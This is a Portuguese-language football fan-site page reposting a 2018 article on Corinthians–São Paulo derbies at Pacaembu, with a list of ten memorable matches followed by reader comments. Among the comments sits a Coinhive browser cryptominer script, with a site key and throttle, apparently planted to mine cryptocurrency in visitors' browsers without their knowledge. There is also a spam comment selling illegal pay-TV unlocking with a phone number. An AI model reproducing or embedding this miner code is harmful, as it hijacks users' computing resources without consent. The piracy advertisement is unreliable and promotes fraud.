27/1/2018 12:00

Corinthians e São Paulo estão empatados no Pacaembu; veja dez clássicos marcantes

Majestoso já foi disputado 135 vezes no estádio, com 50 vitórias para cada lado

Corinthians e São Paulo estão empatados no Pacaembu; veja dez clássicos marcantes
Após quase quatro anos, o Pacaembu volta a receber neste sábado, às 17h, um clássico entre Corinthians e São Paulo. O estádio já foi palco de 135 Majestosos, com histórico extremamente equilibrado.



Foram 50 vitórias para cada lado e 35 empates. O Corinthians leva pequena vantagem em gols marcados, com 218, contra 216 do São Paulo.

Na última vez em que o Majestoso ocorreu no Paulo Machado de Carvalho, em 9 de março de 2014, pelo Paulistão, deu Tricolor: 3 a 2.

Veja dez jogos marcantes entre os rivais no Pacaembu:

É campeão!
O último título conquistado pelo Corinthians sobre o São Paulo foi no Pacaembu. Em 2013, na decisão da Recopa Sul-Americana, o Timão bateu o rival no duelo de ida no Morumbi e ergueu a taça no Paulo Machado de Carvalho, após vitória por 2 a 0. Os gols foram marcados por Danilo e Romarinho.

Tarde das Garrafadas
Em 1957, os rivais se enfrentaram no Pacaembu valendo o título do Paulistão. Quem vencesse, se tornaria campeão. Em caso de empate, porém, seria realizado um triangular com o Santos para decidir o título.

O jogo foi eletrizante e teve três gols em seis minutos. O Tricolor abriu 2 a 0, mas o Timão diminuiu com Rafael e passou a pressionar. O São Paulo, porém, voltou a ampliar a vantagem com Maurinho.

Os alvinegros reclamaram de impedimento no lance, dando início a uma briga generalizada, com os torcedores entrando também no confronto. Revoltada, a torcida corintiana jogou paus, pedras e garrafas no bandeirinha britânico Lynch. Assim, a partida teve de ser encerrada e entrou para a história como a "Tarde das Garrafadas".

Goleada e zoação
O São Paulo estava 100% até a 6ª rodada do Brasileirão de 2011, mas não conseguiu fazer frente ao Corinthians, que se aproveitou da expulsão de Carlinhos Paraíba e contou com tarde inspirada de seus "velhinhos". Com gols dos veteranos Danilo, Liedson (três) e Jorge Henrique e um show no segundo tempo, o Timão goleou sem piedade o Tricolor por 5 a 0, no Pacaembu, e arrancou gritos de “olé” e de “o freguês voltou" da Fiel.

Decisão na Copinha
Corinthians e São Paulo também se enfrentaram na final da Copa São Paulo de Juniores. Com geração que tinha Rogério Ceni, André Luís e Jamelli (autor de três gols na decisão), o Tricolor levantou a taça no Pacaembu em 1993 diante de quase 50 mil pessoas.

Teve "troco"
A resposta alvinegra veio em 2004, com vitória por 2 a 0 na decisão da Copinha. Bobô e Rafael marcaram, mas Jô foi a grande revelação daquela safra.

Parado na esquina
O Majestoso também é marcado por provações e brincadeiras entre os rivais. Uma das recentes foi a comemoração "parado na esquina", de Luis Fabiano, inspirada na canção de funk com o mesmo nome. Em 2012, ele marcou duas vezes na vitória por 2 a 1, pelo Brasileirão, e lançou moda. No mesmo jogo, ele imitou a pose famosa do corredor jamaicano Usain Bolt.

Expressinho
Em 1994, Corinthians e São Paulo se enfrentaram na semifinal da Copa Conmebol. O torneio era visto como menos importante, mas a rivalidade entre os clubes deu mais peso ao confronto. O primeiro duelo foi no Pacaembu e contou com sete gols. No total, 6.737 pagantes acompanharam a vitória tricolor por 4 a 3, com show de Juninho, autor de três gols.

O Tricolor utilizou o Expressinho, time formado por jovens talentos (como Denílson, Caio e Pavão) e comandado não por Telê Santana, mas por seu aprendiz Muricy Ramalho. Na partida de volta, no Morumbi, o São Paulo garantiu a classificação à final nos pênaltis. A equipe ainda se sagraria campeã.

Na última volta do ponteiro
A 18 segundos do apito final, o volante Cristian garantiu a vitória, de virada, do Corinthians na primeira partida da semifinal do Paulistão de 2009. Na comemoração, o jogador ainda fez um gesto obsceno para a torcida tricolor.

Boa viagem, rival!
Era a última rodada do Brasileirão de 2012, e os dois clubes já não brigavam por nada. A partida marcou a despedida do Corinthians diante de sua torcida antes de viajar ao Japão para disputar o Mundial de Clubes. E o "adeus" não saiu como o esperado. Jogando com uma formação inteiramente reserva no Pacaembu, a equipe do Morumbi derrotou o Timão por 3 a 1, de virada.

Baile em campo, confusão fora
Em 2005, na estreia do técnico Paulo Autuori, o São Paulo goleou o Corinthians no Pacaembu por 5 a 1. O Timão vinha de eliminação para o Figueirense, na Copa do Brasil, e revoltou alguns torcedores, que invadiram o gramado no segundo tempo e entraram em confronto com a polícia. A derrota culminou na demissão do técnico Daniel Passarella.


VEJA TAMBÉM
- Timão escalado para o jogo contra o Argentinos Juniors
- Reserva do Corinthians, Carlos Miguel é sondado por clubes do Brasil e da Europa
- Timão escalado para o jogo contra o Juventude









5763 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

nem sabia q tinha comecado já

é hoje vamos mudar esse placar! vai meu timão.

Vai Corinthians

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade